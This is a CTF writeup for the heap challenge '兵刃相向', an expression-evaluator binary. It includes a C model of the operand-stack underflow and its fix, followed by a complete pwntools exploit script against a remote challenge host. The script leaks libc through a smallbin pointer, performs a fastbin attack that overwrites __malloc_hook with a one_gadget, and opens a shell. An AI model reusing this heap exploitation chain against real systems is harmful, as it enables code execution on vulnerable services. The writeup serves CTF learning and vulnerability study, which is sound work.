[Share] Challenge 6 兵刃相向 writeup
2020-11-29 22:08 4363


Challenge 6 兵刃相向 writeup

Approach

The program converts an infix expression to postfix and evaluates it. The checks in parse_infix_expression and process_infix_token are fairly strict, so the attack should focus on evaluate_postfix_expression. When the program takes a heap chunk it does not zero the chunk's old contents. So: allocate two chunks A and B, set B's name to a string of operators, free both so that A and B consolidate, then allocate a slightly larger chunk from the merged space so that the postfix buffer runs straight into B's old name. The evaluator then sees a postfix expression with more operators than operands.
With more operators than operands, this code accesses g_ctx.g_symbol_ptrs out of bounds: each surplus operator pops below the bottom of the operand stack, so it reads a chunk address out of g_ctx.g_symbol_ptrs, applies the arithmetic, and writes the result back. Being able to add to or subtract from the chunk addresses stored there is enough to do a lot.
Since the chunk addresses in g_ctx.g_symbol_ptrs can be changed, pval is controllable. Use pval to write a multiplication operator, then use the multiplication operator out of bounds to zero g_ctx.g_broken, leak a smallbin address (which gives the libc base), and build a fastbin attack that writes a one_gadget into __malloc_hook to get a shell.
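The stack-underflow behaviour described above, as an added example written for this writeup rather than code from the challenge binary. It models the evaluator with a pointer table placed directly before the operand stack, the way g_ctx.g_symbol_ptrs sits next to the evaluation stack in the challenge: the unchecked version of eval_postfix pops past the stack bottom on "1 +", adds 1 to the last table entry and writes it back, while the hardened version rejects the expression because it checks stack depth against the stack base. The names (ctx_t, eval_postfix_vuln, STACK_BASE), the flat-array layout and the fake chunk addresses are assumptions of the model, not the binary's real g_ctx.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the evaluator's state.  Assumption: the operand stack sits
 * directly after the pointer table, like g_ctx.g_symbol_ptrs in the
 * challenge.  One flat array is used so that an underflowing stack index
 * lands in the pointer table without leaving the C object. */
#define NPTRS       8               /* stand-in for g_ctx.g_symbol_ptrs */
#define STACK_DEPTH 8
#define STACK_BASE  NPTRS           /* cell index of the first stack slot */
#define NCELLS      (NPTRS + STACK_DEPTH)

typedef struct {
    int64_t cell[NCELLS];           /* [0,NPTRS) pointers, [NPTRS,NCELLS) stack */
} ctx_t;

static int apply(char op, int64_t x, int64_t y, int64_t *out) {
    switch (op) {
    case '+': *out = x + y; return 0;
    case '-': *out = x - y; return 0;
    case '*': *out = x * y; return 0;
    default:  return -1;            /* unknown token */
    }
}

/* Evaluate a space-separated postfix expression of decimal operands and
 * the operators + - *.  With hardened == 0 an operator only keeps the
 * index inside the arena (the challenge binary checks nothing at all);
 * with hardened == 1 it checks the depth relative to the stack base,
 * which is the fix.  Returns 0 on success, -1 on error. */
static int eval_postfix(ctx_t *c, const char *expr, int64_t *result, int hardened) {
    int sp = STACK_BASE;            /* index of the next free stack slot */
    for (const char *t = expr; *t; t++) {
        if (isspace((unsigned char)*t))
            continue;
        if (isdigit((unsigned char)*t)) {
            int64_t v = 0;
            while (isdigit((unsigned char)*t))
                v = v * 10 + (*t++ - '0');
            t--;                    /* the loop increment steps past the number */
            if (sp >= NCELLS)
                return -1;          /* stack full */
            c->cell[sp++] = v;
            continue;
        }
        /* An operator needs two operands on the stack. */
        if (hardened ? (sp - STACK_BASE < 2) : (sp < 2))
            return -1;
        int64_t y = c->cell[--sp];
        int64_t x = c->cell[--sp];  /* underflows into the pointer table when unchecked */
        int64_t r;
        if (apply(*t, x, y, &r) < 0)
            return -1;
        c->cell[sp++] = r;          /* and the result is written back there */
    }
    if (hardened ? (sp - STACK_BASE != 1) : (sp < 1))
        return -1;
    *result = c->cell[sp - 1];
    return 0;
}

int eval_postfix_vuln(ctx_t *c, const char *expr, int64_t *result) {
    return eval_postfix(c, expr, result, 0);
}

int eval_postfix_hardened(ctx_t *c, const char *expr, int64_t *result) {
    return eval_postfix(c, expr, result, 1);
}

/* Fill the pointer table with constructed fake chunk addresses. */
void ctx_init(ctx_t *c) {
    memset(c, 0, sizeof *c);
    for (int i = 0; i < NPTRS; i++)
        c->cell[i] = 0x555555758000 + 0x30 * i;   /* constructed values, not a real heap */
}

int main(void) {
    ctx_t c;
    int64_t r = 0;
    int rc;

    ctx_init(&c);
    rc = eval_postfix_vuln(&c, "3 4 + 2 *", &r);
    printf("'3 4 + 2 *' -> rc=%d result=%lld\n", rc, (long long)r);

    /* "1 +" is one operand short: the unchecked evaluator pops the last
     * table entry, adds 1 to it and writes it back, which is the pointer
     * arithmetic the writeup uses on g_ctx.g_symbol_ptrs. */
    ctx_init(&c);
    rc = eval_postfix_vuln(&c, "1 +", &r);
    printf("vuln  '1 +' -> rc=%d result=%#llx ptr[%d]=%#llx\n",
           rc, (long long)r, NPTRS - 1, (long long)c.cell[NPTRS - 1]);

    ctx_init(&c);
    rc = eval_postfix_hardened(&c, "1 +", &r);
    printf("fixed '1 +' -> rc=%d ptr[%d]=%#llx\n",
           rc, NPTRS - 1, (long long)c.cell[NPTRS - 1]);
    return 0;
}
```

The fix is the depth test against STACK_BASE: the operator count can only exceed the operand count if the evaluator is allowed to pop below the bottom of its own stack, so checking depth before every pop (and requiring exactly one value left at the end) closes the primitive regardless of how the stale bytes got into the postfix buffer.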
The script is badly written and has plenty of room for optimization, but it got the job done, and I couldn't be bothered to clean it up.

The exploit is as follows:

from pwn import *

context.log_level = "debug"
local = False
if local:
    p = process("./ee")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    one_gadget = 0xf0364
    smallbin_offset = 0x7ffff7dd1b88 - 0x7ffff7a0d000   # leaked smallbin pointer minus libc base
else:
    p = remote("121.36.145.157", 10000)
    libc = ELF("./x64_libc.so.6")
    one_gadget = 0xf02a4
    smallbin_offset = 104 + 0x3C4B20

def Gdb():
    gdb.attach(p, "b *0x555555554000+0x22C3\ndirectory ./srcs/\n")
    #0x1bb7

# menu wrappers: 1 = create, 2 = delete, 3 = re-evaluate, 4 = show
def create(name, express):
    p.sendlineafter(": ", str(1))
    p.sendafter(": ", name)
    p.sendafter(": ", express)
def show(name):
    p.sendlineafter(": ", str(4))
    p.sendafter(": ", name)
def delete(name):
    p.sendlineafter(": ", str(2))
    p.sendafter(": ", name)
def revalute(name):
    p.sendlineafter(": ", str(3))
    p.sendafter(": ", name)
def getSize(size):
    return (size + 27 + 0x10)


# A, B, C: B's name is made of operators; A and B are freed and consolidate
create("aaa\n", ("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2, ("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n", ("00000000000000*" * 6)[:-1]) #2 used

delete("aaa\n") #0 free
delete("-" * 2) #1 free

# slightly larger chunk carved from the merged A+B space: its postfix buffer
# now runs into B's stale operator name, so operators outnumber operands
create("aaa\n", ("00000000001-" + "000000000000-" * 7)[:-1] + "00")
#0 used
length = "qwertyuiopsdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
for i in range(21 - 3):
    create(length[i] * 2, "1+1")
create("*" * 18, "10000 * 347063282342678 + 7882")
revalute("aaa\n")
revalute("\n")
# every re-evaluation of the unbalanced expression does arithmetic on an
# entry of g_ctx.g_symbol_ptrs
for i in range(26):
    revalute("aaa\n")
for i in range(21 - 3):
    delete(length[i] * 2)

revalute("\n")

create("aaa\n", ("00000000000000*" * 6)[:-1]) #0 used
create("-" * 2, ("00000000000000*" * 6)[:-1]) #1 used
create("ccc\n", ("00000000000000*" * 6)[:-1]) #2 used

delete("aaa\n") #0 free
delete("-" * 2) #1 free
create("aaa\n", ("00000000001-" + "000000000000-" * 7)[:-1] + "00")

#create("zzz\n",("00000000008-" + "000000000000-" *5)[:-1] + "00") #fastbin attack
#create("uuu\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
#create("kkk\n",("00000000008-" + "000000000000-" *5)[:-1] + "00")
# walk the corrupted symbol pointer to the chunk holding the smallbin pointer
# (offsets taken from a debugging session on the local binary)
offset = (0x00005555557584a5 - 0x5555557580fd)
for i in range(offset):
    revalute("aaa\n")
show("1 +00000000!\n")
p.recvuntil("[*]value : ")

smallbin = int(p.recvline()[:-1])
#Gdb()
log.success("smallbin ==> " + hex(smallbin))
libc.address = smallbin - smallbin_offset
offset = (0x5555557580fd - 0x5555557580b0)
for i in range(offset):
    revalute("aaa\n")
delete("\n")
for i in range(21 - 6):
    create(length[i] * 2, "1+1")
create("zzz\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00") #fastbin attack
create("uuu\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("kkk\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("ttt\n", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
offset = (0x0000555555758730 - 0x00005555557586c0)
for i in range(offset):
    revalute("aaa\n")

delete("kkk\n")
delete("uuu\n")
delete("\n")
#Gdb()
delete("aaa\n")
delete("qq\n")
delete("rr\n")
delete("uu\n")
# fastbin attack: fake fd pointing just below __malloc_hook (0x7f size trick)
create(p64(libc.sym['__malloc_hook'] - 0x23), ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("deadC0de1", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
create("deadC0de2", ("00000000008-" + "0000000000-" * 4)[:-1] + "00")
one_gadget = libc.address + one_gadget
one_gadget = one_gadget // 4   # the address is sent as n * 4; integer division keeps it an int under Python 3
create("a" * 0x12, "{0} * 4 {1}".format(one_gadget, "-00000000" * 4))
#Gdb()
create("getshell", "1-1")   # next malloc fires __malloc_hook -> one_gadget
p.interactive()

